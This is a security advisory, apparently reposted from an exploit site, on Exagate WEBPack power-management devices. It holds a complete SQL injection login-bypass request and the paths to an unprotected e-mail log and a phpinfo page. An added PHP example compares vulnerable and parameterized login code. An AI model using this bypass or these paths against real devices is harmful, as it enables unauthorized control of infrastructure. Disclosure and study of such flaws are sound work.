Exagate WEBPack Management System - Multiple Vulnerabilities

07 Oct 2016 | Reported by Halil Dalabasmaz | Type: zdt | Source: 0day.today

Exagate WEBPack Management System - Multiple Vulnerabilities, SQL Injection, Unauthorized Access, Configuration Files Disclosure

Document Title:
================
Exagate WEBpack Management System Multiple Vulnerabilities
 
Author:
========
Halil Dalabasmaz
 
Release Date:
==============
07 OCT 2016
 
Product & Service Introduction:
================================
WEBPack is the individual built-in user-friendly and skilled web
interface allowing web-based access to the main units of the SYSGuard
and POWERGuard series. The advanced software enables the users to
design their customized dashboard smoothly for a detailed monitoring
and management of all the power outlet sockets & sensor and volt free
contact ports, as well as relay outputs. User definition and authorization,
remote access and update, detailed reporting and archiving are among the
many features.
  
Vendor Homepage:
=================
http://www.exagate.com/
 
Vulnerability Information:
===========================
Exagate uses the WEBPack Management System software on its hardware.
The software is web-based and provides control of the hardware. It
contains multiple vulnerabilities.
 
Vulnerability #1: SQL Injection
================================
 
There is no filtering or validation mechanism on "login.php". The "username"
and "password" inputs are vulnerable to SQL Injection attacks. A sample POST
request is given below.
 
POST /login.php HTTP/1.1
Host: <TARGET HOST>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
 
username=root&password=' or 1=1--
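
Why the request above succeeds, and what closes it: the script below is an added example, not code from the advisory or from Exagate. It runs the advisory's password value through a login check that concatenates input into the SQL text and through one that uses a bound parameter. The table, column and function names are hypothetical, and in-memory SQLite (PHP's pdo_sqlite extension) stands in for the product's backend, which the advisory does not name.

```php
<?php
// Added example, not WEBPack code: table, column and function names are
// hypothetical, and in-memory SQLite stands in for the unknown backend.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT, pw_hash TEXT)');
$sample = 'constructed-sample-password';   // constructed test credential
$db->prepare('INSERT INTO users VALUES (?, ?, ?)')
   ->execute(['root', $sample, password_hash($sample, PASSWORD_DEFAULT)]);

// Pattern the advisory describes: no filtering, values spliced into the SQL text.
function login_concat(PDO $db, string $user, string $pass): bool
{
    $sql = "SELECT 1 FROM users WHERE username = '$user' AND password = '$pass'";
    return $db->query($sql)->fetch() !== false;
}

// Hardened: the username travels as a bound parameter, so it is always data,
// and the password is verified in PHP and never reaches the SQL engine.
function login_bound(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT pw_hash FROM users WHERE username = ?');
    $stmt->execute([$user]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($pass, $hash);
}

$payload = "' or 1=1--";   // password value from the advisory's sample request
foreach ([['root', $sample], ['root', 'wrong'], ['root', $payload]] as [$u, $p]) {
    printf("%-30s concat=%-5s bound=%s\n", $p,
        var_export(login_concat($db, $u, $p), true),
        var_export(login_bound($db, $u, $p), true));
}
```

In the concatenated query the quote ends the string literal, `or 1=1` makes the WHERE clause true for every row, and `--` comments out the trailing quote; the bound version treats the same bytes as a wrong password.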
 
Vulnerability #2: Unauthorized Access To Sensitive Information
===============================================================
 
The software is capable of sending e-mail to system admins, but there is no
authorization mechanism protecting the e-mail logs. The e-mail logs can be
accessed anonymously at "http://<TARGET HOST>/emaillog.txt".
 
Vulnerability #3: Unremoved Configuration Files
================================================
 
The software contains a PHP Info file at the following URL.
 
http://<TARGET HOST>/api/phpinfo.php
 
Vulnerability Disclosure Timeline:
==================================
03 OCT 2016 -   Attempted to contact vendor after discovery of vulnerabilities
06 OCT 2016 -   No response from vendor and re-attempted to contact vendor
07 OCT 2016 -   No response from vendor
07 OCT 2016 -   Public Disclosure
  
Discovery Status:
==================
Published
  
Affected Product(s):
=====================
Exagate SYSGuard 3001 (Most probably all Exagate hardware is affected by these vulnerabilities)
 
Tested On:
===========
Exagate SYSGuard 3001

#  0day.today [2018-03-09]  #
